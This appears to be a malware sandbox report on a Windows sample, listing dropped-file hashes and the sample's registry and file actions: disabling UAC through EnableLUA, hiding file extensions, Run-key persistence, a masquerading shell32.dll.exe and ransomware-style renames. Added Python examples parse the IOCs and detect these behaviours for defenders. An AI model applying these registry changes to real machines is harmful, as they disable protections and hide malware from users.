SHA256 09e39702c9ce17aa4ba931e9da3bc969a029986f267a06b471847acd93aadd7b
SHA512 c1181fcb26581f7e8a3b148318226c462c86a555870a2384e54e290c2a0357107c97e512932c08140744212dc792925971977b116cfb2b36448162928c3aeedc

C:\Users\Admin\AppData\Local\Temp\swwk.exe

MD5 560c99be3f6dcef1ac53f90e8695f518
SHA1 71bd7937c826eec8eea1baf3773bc3c6231a4f81
SHA256 ec89d0130f21d11976b412192e9411a62d88db78a385463ef42b9150cefd8030
SHA512 57a5b800b5a61f26a3c8f98986f10d07032c4cbfb9a1edfc1a387fe3e20aa606fd8be8a093aae7e219f2cd5397fdeaaac2a4cc1c4736d70d0ef867253bd8313a

C:\Users\Admin\AppData\Local\Temp\hOAMkMUg.bat

MD5 5bd64bc997950146509410b9608dacb4
SHA1 1dc312f16318853f770add16903680e5f9d39d1c
SHA256 1c5ad54f635e0a4098fec655249ab6a781d23241a3ff758e495e329cfa459a43
SHA512 d27812c8e4e968f68457dcd1904a13d86f2932e562d08395533880a4c1f78bf9f16c35cc56c4a2be2557ef42ffe312a379d1e1cac220e8f16a3412afea45877c

C:\Users\Admin\AppData\Local\Temp\VSAUMYoo.bat

MD5 23f518b78e6a0d1a3f4d361cfb517a7c
SHA1 6cd4bbaab586dd221ca754e6dca28df892acaa8c
SHA256 3a8d629e9990a67f0edb18c336ea7bb1659e0faabad2a37315d716b085eb6dab
SHA512 73adb6b6b0383a8c79084a64692961e6568a92af287d3a2aaf452d6c44223e63e3eaa872718d4c65be9a41c8b9b0d8da3c69360cc77c7a353a99ad336dcdbbfb

C:\Users\Admin\AppData\Local\Temp\jAsUEMIc.bat

MD5 888d3aaa146972c99b2b28a22ad2d050
SHA1 5d3e86e0e4fd47a83d627d8cb133d2b7658d46cd
SHA256 b1e0065db35a0a2fc3463ac46a1d5ee7a1deb4aaabaab01e7996b8d2e3f60d27
SHA512 96ce382f074148ecc2809d0fd560e977caa2740fbff4def167053ed22cf455c97bff773e1b962f736ba185b0ae636997fda06edb2998f745e5f3b58084669647

C:\Users\Admin\AppData\Local\Temp\pYIowAkM.bat

MD5 6d5c658a62bd1bc89b03926bc40c8547
SHA1 234879b0ff3e7571bacf5f9b4e962ca2e7860d9a
SHA256 abfd249705f4decf9b8680ec886e28ec93abd90f9bc076dba00077beb1f58bfb
SHA512 4e10d7c65ebffe99495b204db5769659afd5ab5b09410bf23fa252bdc6b1796d125f192e8a8229c90eb59d9078e89b71e8f1b6a4850b0fd3bd967ffb8b4867f2

C:\Users\Admin\AppData\Local\Temp\CeEooQAM.bat

MD5 c87f8133abf999fa9b8abcb1923ce1ce
SHA1 be32d73a3d28eae95fd042d7c468981b591956c6
SHA256 38c5cc56de6057004c666f4904db717b7b01ef6c56e2a71b7771cb0d54930f0b
SHA512 151aa573ae0d242933df493cd132fd04836843ce560178b88a25f92bea3524edd6dfd0944ef5932062bd70062f565822956bce9732a8d6a5981883effd73fcba

C:\Users\Admin\AppData\Local\Temp\mGgkAAUY.bat

MD5 bda9412da2875eed97c91dcc38531d53
SHA1 4be015994434184380e3d88167a566e0353fd834
SHA256 9e97a67329bc3cc3eca55cfdaf898d9751b88340f9b2abfc4e737a21c231b07b
SHA512 2419dd18ded72b5c02fb8d0c62ab0ea697d2799fbc97e272685b6f9ad2dc49dc3baaae9676e4afc6f6815bf0902a064080cc17c63c7c4932f9108d6e732322f1

C:\Users\Admin\AppData\Local\Temp\oAAYMAgg.bat

MD5 cfcf016771f7f2f556b9bcb8357e1ad0
SHA1 b3eae1f1cc890303444d2f4dcf97013d1b2ffa62
SHA256 d211929ee35a1379e00d7cf14e32bb2bce603c4071c57fb606ecfec2507bc228
SHA512 133d33a1179d8a81e2187d9a6ab3e2fd5c814a8920d5637b75909a28ba85feb1db5148f70a4c3e97577d201e8bd4dc5369ac0743b615981be4bcbf5bbc08270d

C:\Users\Admin\AppData\Local\Temp\xAYMMgAQ.bat

MD5 98e4def231c1d6c26abe8db94558c4bd
SHA1 4563523b10dc32f2a7ecdd16901e2018739c2c51
SHA256 b11666400be2630b0efd607a957fb9d54f1cf8cf44283823b73ce28e40fe4b87
SHA512 1d1e9d396c0f2ee8e2c47cc9d664da1873ff3e5ff6bc813999b01105bfa5cec6dfbc6bf6bf52755574cab666328c1e3133dd673934f29050dec8c640dfdbbaa9

C:\Users\Admin\AppData\Local\Temp\vscwgQIo.bat

MD5 9f5b3af7fc2d1298cd0534c6f34dd248
SHA1 694e5c0730d70de1408f20007811e2351e284182
SHA256 b7838a2e61da7e32bdcc27e302a1c4a95945521bab036cd709c956c083559c5a
SHA512 963d4daf785537ea14377c8a826c2d458c73cb7f3b70f7814bfc020c8116c0d0d73ba6e5a0ec75c67126a8835ea38bf673baf3dc939f7c3ff1058aa79953e12e

C:\Users\Admin\AppData\Local\Temp\pyoMoYQk.bat

MD5 fb43acbd4fa54e71ceb7f0100b5e0ed8
SHA1 28b7b31b1a6d720e6f475233bd487a5f9385990f
SHA256 7b9376735b339172220ed8ef4e46d39ef01992700eaaec54251ac18a762b66d2
SHA512 af332b22472622fc6df311f080322fdadefffbb6d63323e9f62d5db6477b64f831c7d5a950a0b285e4b631ce5ab7b476a41f1793d5adc1b625f8afae413b5ecc

C:\Users\Admin\AppData\Local\Temp\fwIYsUko.bat

MD5 7ee847d1448f39f34e7f44bddcb4f01a
SHA1 28e7b955ffbf50828139e635564be7736107e899
SHA256 4d424c30f00c4ccba475fce896ca5201987ab29c5c1dae7e38e4aa488545de9b
SHA512 59270be0f42d003b7730965b879f7265a777f58b3e5c67cbc29b53199ec87623d48eb7e6380bbdc519f89c2c906fe4ee9af78d60ffdf0c32df49e89c6cbff75e

C:\Users\Admin\AppData\Local\Temp\SkIEIgMs.bat

MD5 79e70c2f88a320ba7e491eec731b877b
SHA1 301d0e6644a97dc234d9ea44b5ad84df4fe34d4f
SHA256 e71ffb1106ac2273c317ca9dc250689458c4f7b919a1ec9145b59dd1f4ca07fc
SHA512 b9056a1be9b99b5c5499d99d5be4d84ad676fd863ba5aa0c619dbdeb839e8bfa9dd617dbedc35937451afe41d7c3dae88088d054090d1b900ae67c0e6276bc53

C:\Users\Admin\AppData\Local\Temp\WSYYMAcA.bat

MD5 d2f8cf29d44583fd30457ef147056478
SHA1 ce1d32350daf261544361e87936c86f36feef0ad
SHA256 a66e2407beecac6841f8c662c9c6506cf412e371959e6b904c2ac2f9c56e3612
SHA512 40b0a176ec567c741555694b4b30d74499dfb893b65a65d877bc6012ce9b1580fcea5861fbe522387541666d5bc40784084d565a141915608fe7755a4baa03b0

C:\Users\Admin\AppData\Local\Temp\cMcEoIsg.bat

MD5 a86989ddd983e980d061908a61e9b737
SHA1 a9dd93bca8038e1f8407045d7665cf03c71d5403
SHA256 a8e63412c8b7cef92cf1c13577d91f0261bca673ac421ce9881824afc07fd82d
SHA512 9c79a6488b56c50f2658fc859bd8683596c4d1783c9e8558d318afa1369d30164c5c64c1c7736b1b431f8297c79d14d5c59a46172fa50040574fa9b8975e7abd

C:\Users\Admin\AppData\Local\Temp\BKYEoYAQ.bat

MD5 c750a4c6199ceb1eac4659f43dab909d
SHA1 cdb8adb52249222e7184629f7cf8ba0e927175fb
SHA256 c3c33a42855ed0f1c04b2ea567fa5c8ac4ba293e09f6273db32d92fef94f6be2
SHA512 6ac492b639fe370220c1d8450e247ea90a615153227b6120f31b272f083990a3c4ac3de4e94ccfa5851a44a914e65322f860dc6550071822d625fbc088636598

C:\Users\Admin\AppData\Local\Temp\HugQEQYw.bat

MD5 dc04adf5157b361294d93dd45d36fbcf
SHA1 503c6a58ecac087f4afed6dc7bfad434203dfba5
SHA256 7d7f9cd9506298a35fc8fb1fcc9b6b32774e590f60fe6615a93b4a9789b24163
SHA512 acd1fdc65c20c5247f8e259155db49c7dbb3db86982ba84e092b5e63194b0b1252d4cb3cc17a0e1d9bbcb3e1c19038f5646585832f59cdfa661a95d045bc4b36

C:\Users\Admin\AppData\Local\Temp\necoIAUs.bat

MD5 63350624360fbcba81775bf138410ff2
SHA1 468c0902492dcf9fbeced8dbb9f1ccfb15028bbd
SHA256 d14f69b3218c54b0eb818c15e1fcc0b54e4cfa32599f6bbcb58380c99ed8b8b4
SHA512 e674703362cab8e5b3f8f60d7b3727df0928cbe700263583c146104f0e0b5e1ac911e2c19439ef4075287ff55cc3dd888a8eac05c94548984458f368391bb9bb

memory/2380-2939-0x0000000077570000-0x000000007768F000-memory.dmp

memory/2380-2940-0x0000000077470000-0x000000007756A000-memory.dmp
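
The digest listing above is the report's dropped-file inventory, in the flat "path, blank line, four digest lines" layout the sandbox emits. Below is an added example (editor's code, not part of the sandbox report) that parses that layout into IOC records, checks that each digest has the length its algorithm requires (scraped reports sometimes truncate long hex strings), and matches a byte buffer against the set. Only three of the listed files are embedded; the buffer hashed at the end is constructed and matches nothing, so a hit is only expected when a real file's bytes are available.

```python
"""IOC ingestion for the dropped-file listing in this report.

Added example, not part of the sandbox report. The digests are copied from
the report; the buffer hashed at the end is constructed for the demo.
"""
import hashlib
import re

DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Three entries in the report's own layout (the other .bat entries look the same).
REPORT_EXCERPT = r"""
C:\Users\Admin\AppData\Local\Temp\YUMU.exe

MD5 41c2896ac00d2da73ba6606a307e4b8c
SHA1 3c3379998b6f189f5cf276b22454982b6fb03fdc
SHA256 09e39702c9ce17aa4ba931e9da3bc969a029986f267a06b471847acd93aadd7b
SHA512 c1181fcb26581f7e8a3b148318226c462c86a555870a2384e54e290c2a0357107c97e512932c08140744212dc792925971977b116cfb2b36448162928c3aeedc

C:\Users\Admin\AppData\Local\Temp\swwk.exe

MD5 560c99be3f6dcef1ac53f90e8695f518
SHA1 71bd7937c826eec8eea1baf3773bc3c6231a4f81
SHA256 ec89d0130f21d11976b412192e9411a62d88db78a385463ef42b9150cefd8030
SHA512 57a5b800b5a61f26a3c8f98986f10d07032c4cbfb9a1edfc1a387fe3e20aa606fd8be8a093aae7e219f2cd5397fdeaaac2a4cc1c4736d70d0ef867253bd8313a

C:\Users\Admin\AppData\Local\Temp\hOAMkMUg.bat

MD5 5bd64bc997950146509410b9608dacb4
SHA1 1dc312f16318853f770add16903680e5f9d39d1c
SHA256 1c5ad54f635e0a4098fec655249ab6a781d23241a3ff758e495e329cfa459a43
SHA512 d27812c8e4e968f68457dcd1904a13d86f2932e562d08395533880a4c1f78bf9f16c35cc56c4a2be2557ef42ffe312a379d1e1cac220e8f16a3412afea45877c
"""

DIGEST_LINE = re.compile(r"(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)")


def parse_listing(text):
    """Return {path: {"MD5": hex, "SHA1": hex, ...}} from the flat listing.
    A digest line that appears before any path line is an error, not noise."""
    records, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = DIGEST_LINE.fullmatch(line)
        if m:
            if current is None:
                raise ValueError(f"digest before any path: {line}")
            records[current][m.group(1)] = m.group(2).lower()
        else:
            current = line  # any other non-empty line starts a new record
            records[current] = {}
    return records


def validate(records):
    """List records whose digests are missing or the wrong length for the algorithm."""
    problems = []
    for path, digests in records.items():
        for algo, length in DIGEST_LEN.items():
            value = digests.get(algo)
            if value is None:
                problems.append(f"{path}: missing {algo}")
            elif len(value) != length:
                problems.append(f"{path}: {algo} has {len(value)} hex chars, expected {length}")
    return problems


def digests_of(data):
    """All four digests of a byte buffer, keyed like the report."""
    return {"MD5": hashlib.md5(data).hexdigest(),
            "SHA1": hashlib.sha1(data).hexdigest(),
            "SHA256": hashlib.sha256(data).hexdigest(),
            "SHA512": hashlib.sha512(data).hexdigest()}


def index_by_digest(records):
    """Reverse index digest -> (path, algo) so a lookup is a single dict probe."""
    return {value: (path, algo)
            for path, digests in records.items()
            for algo, value in digests.items()}


def match_blob(data, index):
    """IOC paths whose digests match `data`, reported with the strongest
    algorithm that hit; one entry per path."""
    computed, hits = digests_of(data), []
    for algo in ("SHA512", "SHA256", "SHA1", "MD5"):
        hit = index.get(computed[algo])
        if hit and hit[0] not in [h[0] for h in hits]:
            hits.append((hit[0], algo))
    return hits


IOCS = parse_listing(REPORT_EXCERPT)
INDEX = index_by_digest(IOCS)

if __name__ == "__main__":
    print("validation:", validate(IOCS) or "ok")
    sample = b"constructed sample bytes, not the real dropper"  # constructed
    print("matches for constructed blob:", match_blob(sample, INDEX))
    print(INDEX.get("09e39702c9ce17aa4ba931e9da3bc969a029986f267a06b471847acd93aadd7b"))
```

When ingesting hashes from a report like this one, run `validate()` before loading them into a blocklist; a truncated SHA512 silently matches nothing, and an MD5-only hit is still worth reporting as long as the algorithm is recorded beside it.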

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-26 00:06

Reported

2024-10-26 00:09

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
(the report lists this identical row 64 times: 64 Set-value events on HideFileExt, all attributed to reg.exe)

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
(the report lists this identical row 64 times: 64 Set-value events on EnableLUA, all attributed to reg.exe)

Renames multiple (85) files with added filename extension

ransomware
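
The signature above reports only a count (85 renamed files); neither the appended extension nor the renaming process is given in this section. As an added example (editor's code, not the sandbox's own detection logic), the heuristic below is the kind of rule behind such a signature: it flags a process that appends the same extension to many files within a short window, while ignoring one-off renames. The process name, file paths, the ".locked" suffix and the timestamps in SAMPLE_EVENTS are constructed for the demo and are not taken from the report.

```python
"""Mass-rename heuristic for an "appended filename extension" ransomware signature.

Added example, not the sandbox's code. All events below are constructed.
"""
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

THRESHOLD = 5                   # appended-extension renames before alerting
WINDOW = timedelta(seconds=60)  # sliding window per (process, suffix)


def appended_extension(old, new):
    """Return the suffix when `new` is exactly `old` plus one more extension
    (report1.docx -> report1.docx.locked); None for any other rename."""
    if not new.startswith(old + "."):
        return None
    suffix = new[len(old):]
    if "\\" in suffix or suffix.count(".") != 1:
        return None
    return suffix.lower()


def detect_mass_rename(events, threshold=THRESHOLD, window=WINDOW):
    """events: (timestamp, process, old_path, new_path) tuples in time order.
    Emits one alert per (process, suffix) the first time `threshold` such
    renames fall inside `window`; the alert's count is the total seen for that
    key over the whole input, so the reader gets "85", not "5"."""
    recent = defaultdict(deque)  # timestamps inside the window, per key
    totals = Counter()
    first_seen, alerted = {}, {}
    for ts, proc, old, new in events:
        suffix = appended_extension(old, new)
        if suffix is None:
            continue
        key = (proc, suffix)
        totals[key] += 1
        first_seen.setdefault(key, ts)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # q is never empty here: ts was just appended
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted[key] = {"process": proc, "suffix": suffix,
                            "first": first_seen[key], "triggered_at": ts}
    return [dict(alert, count=totals[key]) for key, alert in alerted.items()]


# Constructed sample: a hypothetical encryptor renaming ten documents one second
# apart, plus two benign Explorer renames that must not trigger.
T0 = datetime(2024, 10, 26, 0, 7, 0)
ENCRYPTOR = r"C:\Users\Admin\demo\encryptor.exe"  # hypothetical process name
SAMPLE_EVENTS = sorted(
    [(T0 + timedelta(seconds=i), ENCRYPTOR,
      rf"C:\Users\Admin\Documents\report{i}.docx",
      rf"C:\Users\Admin\Documents\report{i}.docx.locked") for i in range(10)]
    + [(T0 + timedelta(seconds=3), r"C:\Windows\explorer.exe",
        r"C:\Users\Admin\Desktop\notes.txt", r"C:\Users\Admin\Desktop\notes.txt.bak"),
       (T0 + timedelta(seconds=4), r"C:\Windows\explorer.exe",
        r"C:\Users\Admin\Desktop\old.txt", r"C:\Users\Admin\Desktop\new.txt")],
    key=lambda e: e[0])

if __name__ == "__main__":
    for alert in detect_mass_rename(SAMPLE_EVENTS):
        print(f"{alert['process']} appended {alert['suffix']} to {alert['count']} files "
              f"(first {alert['first']:%H:%M:%S}, alerted {alert['triggered_at']:%H:%M:%S})")
```

The rule only sees the rename path. Many encryptors write a new file and delete the original instead, so in production this heuristic belongs beside a write-volume or entropy check on the same process; the sandbox signature here fires because this sample does rename in place.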

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\mSgYkYQw\lWwscwwc.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lWwscwwc.exe = "C:\\Users\\Admin\\mSgYkYQw\\lWwscwwc.exe" C:\Users\Admin\mSgYkYQw\lWwscwwc.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lWwscwwc.exe = "C:\\Users\\Admin\\mSgYkYQw\\lWwscwwc.exe" C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\IOcYUcsQ.exe = "C:\\ProgramData\\RogQUwEA\\IOcYUcsQ.exe" C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\IOcYUcsQ.exe = "C:\\ProgramData\\RogQUwEA\\IOcYUcsQ.exe" C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\shell32.dll.exe C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
File opened for modification C:\Windows\SysWOW64\shell32.dll.exe C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
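
The four signature tables above (HideFileExt, EnableLUA, the Run keys and the shell32.dll.exe drop) are worth reading together. Hiding extensions is what makes a file named shell32.dll.exe in SysWOW64 display as shell32.dll, and the HKLM EnableLUA write could only succeed because the sample already ran with administrative rights, so "UAC bypass" here means UAC switched off for every user after the next reboot rather than a prompt being bypassed. The following added example (editor's code, not the sandbox's) parses rows in the report's own "Description Indicator Process Target" format, applies rules for those four behaviours, merges identical rows into one finding with a count, and raises a correlated finding when hidden extensions and a double-extension drop occur together. SAMPLE_ROWS are copied from the tables above; rule names, severities and the ATT&CK technique IDs are the editor's mapping, not the report's.

```python
"""Triage of the signature rows in this report's behavioral2 tables.

Added example by the editor, not the sandbox's own logic. SAMPLE_ROWS are
copied from the tables above; rule names, severities and ATT&CK IDs are the
editor's mapping.
"""
import re

ROW_RE = re.compile(
    r"^(?P<desc>Set value \((?:int|str)\)|File created|File opened for modification"
    r"|Key value queried|Key opened)\s+(?P<rest>.+?)\s+(?P<proc>\S+)\s+(?P<target>\S+)$"
)

SAMPLE_ROWS = [
    r'Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A',
    r'Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lWwscwwc.exe = "C:\\Users\\Admin\\mSgYkYQw\\lWwscwwc.exe" C:\Users\Admin\mSgYkYQw\lWwscwwc.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\IOcYUcsQ.exe = "C:\\ProgramData\\RogQUwEA\\IOcYUcsQ.exe" C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A',
    r'File created C:\Windows\SysWOW64\shell32.dll.exe C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A',
    r'Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A',
    r'Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A',
]

USER_WRITABLE = ("\\users\\", "\\programdata\\")
SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2}


def parse_row(row):
    """Split one row. For Set-value rows the indicator is '<key> = "<value>"';
    the sandbox doubles backslashes inside the quotes, which is undone here."""
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    desc, rest, proc = m.group("desc"), m.group("rest"), m.group("proc")
    if desc.startswith("Set value"):
        key, sep, raw = rest.partition(" = ")
        value = raw.strip('"').replace("\\\\", "\\") if sep else None
    else:
        key, value = rest, None
    return {"desc": desc, "key": key, "value": value, "proc": proc}


def double_extension(path):
    """True for names such as shell32.dll.exe: an executable suffix behind a
    suffix Explorer would show as a harmless library or document."""
    parts = path.rsplit("\\", 1)[-1].lower().split(".")
    return len(parts) >= 3 and parts[-1] == "exe" and parts[-2] in {
        "dll", "txt", "pdf", "doc", "docx", "jpg", "png"}


def triage(rows):
    """Apply the rules; identical hits are merged with a count, so 64 repeated
    reg.exe writes become one finding with count=64."""
    merged = {}

    def hit(sev, rule, proc, detail):
        k = (rule, proc, detail)
        if k in merged:
            merged[k]["count"] += 1
        else:
            merged[k] = {"severity": sev, "rule": rule, "process": proc,
                         "detail": detail, "count": 1}

    for ev in filter(None, map(parse_row, rows)):
        key, val, proc = (ev["key"] or "").lower(), ev["value"], ev["proc"]
        if ev["desc"].startswith("Set value"):
            if key.endswith("\\explorer\\advanced\\hidefileext") and val == "1":
                hit("high", "HideFileExt=1 (T1564)", proc,
                    "per-user Explorer setting; name.dll.exe is displayed as name.dll")
            elif key.endswith("\\policies\\system\\enablelua") and val == "0":
                hit("critical", "EnableLUA=0 (T1548.002)", proc,
                    "HKLM write succeeded, so the writer already ran elevated; "
                    "UAC is off for every user after the next reboot")
            elif "\\currentversion\\run\\" in key:
                writable = bool(val) and any(s in val.lower() for s in USER_WRITABLE)
                name = ev["key"].rsplit("\\", 1)[-1]
                hit("high" if writable else "medium", "Run key (T1547.001)", proc,
                    f"{name} -> {val}")
        elif ev["desc"] == "File created" and "\\windows\\" in key and double_extension(ev["key"]):
            hit("high", "double extension under Windows (T1036.007)", proc, ev["key"])

    rules = {f["rule"] for f in merged.values()}
    if "HideFileExt=1 (T1564)" in rules and "double extension under Windows (T1036.007)" in rules:
        hit("critical", "correlated masquerade", "-",
            "extensions hidden and a *.dll.exe dropped: the file looks like a system DLL in Explorer")
    return sorted(merged.values(), key=lambda f: SEVERITY_ORDER[f["severity"]])


if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f"[{f['severity']:8}] x{f['count']:<2} {f['rule']}: {f['process']} {f['detail']}")
```

Feeding the full tables through `triage()` collapses the 64 HideFileExt rows and the 64 EnableLUA rows into two findings with count=64 each, which is what an analyst wants to see; the per-row view above is the evidence behind them. Rows the rules do not cover (the Geo\Nation query, the NLS\Language opens) parse cleanly and produce nothing.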

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
